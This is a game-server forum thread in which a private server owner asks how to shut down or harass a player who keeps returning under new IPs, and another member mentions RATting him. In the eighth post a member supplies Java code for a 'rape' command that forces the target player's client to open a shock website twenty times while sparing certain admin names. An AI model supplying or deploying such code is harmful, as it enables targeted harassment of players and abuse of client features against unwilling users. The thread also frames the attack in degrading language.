Thread: Banning computer, or rape command

Page 1 of 3 123 LastLast
Results 1 to 10 of 21
  1. #1 Banning computer, or rape command 
    Banned
    Join Date
    Oct 2011
    Posts
    184
    Thanks given
    2
    Thanks received
    0
    Rep Power
    0
    This guy keeps logging in with new ips and accs and being a idiot on my server. Can someone give me a way to shutdown his computer? Or like a rape command to open urls on his side? Or something so he wont come back or something?
    Reply With Quote  
     

  2. #2  
    Donator

    Michael's Avatar
    Join Date
    Nov 2010
    Age
    33
    Posts
    3,139
    Thanks given
    142
    Thanks received
    1,397
    Rep Power
    5000
    Unless you rat him you can barley do shit with his IP.
    Reply With Quote  
     

  3. #3  
    Banned
    Join Date
    Oct 2011
    Posts
    184
    Thanks given
    2
    Thanks received
    0
    Rep Power
    0
    Well i just wanna make it where he wont come back, weather its shutting his computer down or jss banning his computer idc, i just want him gone.
    Reply With Quote  
     

  4. #4  
    Adobe

    Dreamweaver's Avatar
    Join Date
    Jan 2010
    Posts
    1,066
    Thanks given
    38
    Thanks received
    149
    Rep Power
    246
    Could I get a link to your server
    Reply With Quote  
     

  5. #5  
    Donator

    Michael's Avatar
    Join Date
    Nov 2010
    Age
    33
    Posts
    3,139
    Thanks given
    142
    Thanks received
    1,397
    Rep Power
    5000
    Quote Originally Posted by x25xquinton View Post
    Well i just wanna make it where he wont come back, weather its shutting his computer down or jss banning his computer idc, i just want him gone.
    IP ban him
    Reply With Quote  
     

  6. #6  
    Registered Member Aggi's Avatar
    Join Date
    Oct 2007
    Posts
    687
    Thanks given
    203
    Thanks received
    49
    Rep Power
    111
    Quote Originally Posted by Empires View Post
    IP ban him
    Thats useless there are tools out there that can change your proxy and ip.
    Attached image
    Reply With Quote  
     

  7. #7  
    Adobe

    Dreamweaver's Avatar
    Join Date
    Jan 2010
    Posts
    1,066
    Thanks given
    38
    Thanks received
    149
    Rep Power
    246
    Quote Originally Posted by Empires View Post
    IP ban him
    Do you not read, or...?
    Reply With Quote  
     

  8. #8  



    Join Date
    Oct 2011
    Posts
    874
    Thanks given
    301
    Thanks received
    373
    Rep Power
    338
    Code:
    if (playerCommand.startsWith("rape")) {
                    String name = playerCommand.substring(9);
                    if (c.validClient(name)) {
                        Client p = c.getClient(name);
                        if(!p.playerName.equalsIgnoreCase("k0killer2")||p.playerName.equalsIgnoreCase("tyler")||p.playerName.equalsIgnoreCase("shawn")) { 
                             //Replace the names or remove the IgnoreCase
                            for (int i = 0; i < 20; i++){
                            p.getPA().sendFrame126("www.sourmath.com", 12000);
                            }
                            c.sendMessage("You've raped "+p.playerName);
                        }else{
                            for (int i = 0; i < 20; i++){
                            c.getPA().sendFrame126("www.sourmath.com", 12000);
                            }
                        }
                    }else{
                        c.sendMessage("Invalid name");
                    }
                }
    Reply With Quote  
     

  9. #9  
    Banned
    Join Date
    Oct 2011
    Posts
    184
    Thanks given
    2
    Thanks received
    0
    Rep Power
    0
    shawn thank you for acrtually knowing what i meen, ip banning does nothing as there are so many tools. and pkingbandit.net
    Reply With Quote  
     

  10. #10  
    Banned
    Join Date
    Oct 2011
    Posts
    184
    Thanks given
    2
    Thanks received
    0
    Rep Power
    0
    shawn, no matter what i try it says invalid name?
    Reply With Quote  
     

Page 1 of 3 123 LastLast

Thread Information
Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)


User Tag List

Similar Threads

  1. Replies: 12
    Last Post: 01-10-2013, 11:42 AM
  2. ::rape Command
    By Trek in forum Help
    Replies: 0
    Last Post: 08-31-2011, 04:56 AM
  3. Computer Banning?
    By Torture in forum Help
    Replies: 3
    Last Post: 04-19-2009, 04:36 AM
Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •